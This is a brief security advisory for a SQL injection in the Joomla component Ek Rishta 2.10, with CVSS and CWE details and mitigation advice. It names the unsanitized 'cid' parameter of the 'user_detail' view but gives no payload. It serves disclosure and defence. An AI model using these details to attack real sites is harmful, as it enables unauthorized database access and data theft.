Vendor: Ek Rishta
By: 41!kh4224rDz
CVSS: 8.8 HIGH
SQL Injection
CWE: 89
Product Name: Ek Rishta
Affected Version From: 2.10
Affected Version To: 2.10
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlaextensions:ek_rishta:2.10
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64
2018
Joomla! Component Ek Rishta 2.10 – SQL Injection
Joomla! Component Ek Rishta 2.10 contains a SQL injection vulnerability. The 'cid' parameter of the 'user_detail' view is insufficiently sanitized, so user-supplied input reaches the SQL query and can change its structure. An attacker can exploit this by sending a specially crafted HTTP request containing malicious SQL code to the vulnerable application. This can result in the execution of arbitrary SQL commands in the back-end database, allowing an attacker to gain access to sensitive data.
Mitigation:
Use input validation to prevent SQL injection: validate and filter all user-supplied input before it is used in SQL queries. Additionally, use parameterized queries so that input is passed to the database as data rather than as part of the SQL text.